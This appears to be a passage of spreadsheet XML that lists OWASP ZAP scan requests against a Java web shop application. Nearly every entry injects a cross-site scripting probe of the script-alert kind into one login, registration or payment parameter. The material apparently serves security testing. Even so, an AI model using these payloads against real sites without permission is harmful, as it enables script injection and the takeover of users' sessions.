    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;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&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;login=pepe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bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;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&lt;script&gt;alert("owasp+zap");&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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&lt;script&gt;alert(owasp+zap);&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;login=pepe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&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;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&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org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bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85&amp;b1=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;login=pepe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&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;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&lt;script&gt;alert(owasp+zap);&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85&amp;b1=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=registrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85&amp;b1=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org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bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;password=pepe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&lt;script&gt;alert("owasp+zap");&lt;/script&gt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&lt;script&gt;alert('owasp+zap');&lt;/script&gt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&lt;script&gt;alert(owasp+zap);&lt;/script&gt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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org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bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;nombre=pepe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&lt;script&gt;alert("owasp+zap");&lt;/script&gt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&lt;script&gt;alert('owasp+zap');&lt;/script&gt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&lt;script&gt;alert(owasp+zap);&lt;/script&gt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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org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bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;apellidos=perez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&lt;script&gt;alert("owasp+zap");&lt;/script&gt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&lt;script&gt;alert('owasp+zap');&lt;/script&gt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&lt;script&gt;alert(owasp+zap);&lt;/script&gt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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org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bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;email=pepe@yahoo.es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&lt;script&gt;alert("owasp+zap");&lt;/script&gt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&lt;script&gt;alert('owasp+zap');&lt;/script&gt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&lt;script&gt;alert(owasp+zap);&lt;/script&gt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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org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bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;dni=76512347c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&lt;script&gt;alert("owasp+zap");&lt;/script&gt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&lt;script&gt;alert('owasp+zap');&lt;/script&gt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&lt;script&gt;alert(owasp+zap);&lt;/script&gt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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org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bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;direccion=pex,+2,+4�+a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&lt;script&gt;alert("owasp+zap");&lt;/script&gt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&lt;script&gt;alert('owasp+zap');&lt;/script&gt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&lt;script&gt;alert(owasp+zap);&lt;/script&gt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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org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bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;ciudad=valencia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&lt;script&gt;alert("owasp+zap");&lt;/script&gt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&lt;script&gt;alert('owasp+zap');&lt;/script&gt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&lt;script&gt;alert(owasp+zap);&lt;/script&gt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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org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bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;provincia=46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&lt;script&gt;alert("owasp+zap");&lt;/script&gt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&lt;script&gt;alert('owasp+zap');&lt;/script&gt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&lt;script&gt;alert(owasp+zap);&lt;/script&gt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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org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bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;cp=87623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&lt;script&gt;alert("owasp+zap");&lt;/script&gt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&lt;script&gt;alert('owasp+zap');&lt;/script&gt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&lt;script&gt;alert(owasp+zap);&lt;/script&gt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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org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bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;ntc=8734562384562786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&lt;script&gt;alert("owasp+zap");&lt;/script&gt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&lt;script&gt;alert('owasp+zap');&lt;/script&gt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&lt;script&gt;alert(owasp+zap);&lt;/script&gt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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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bob@&lt;s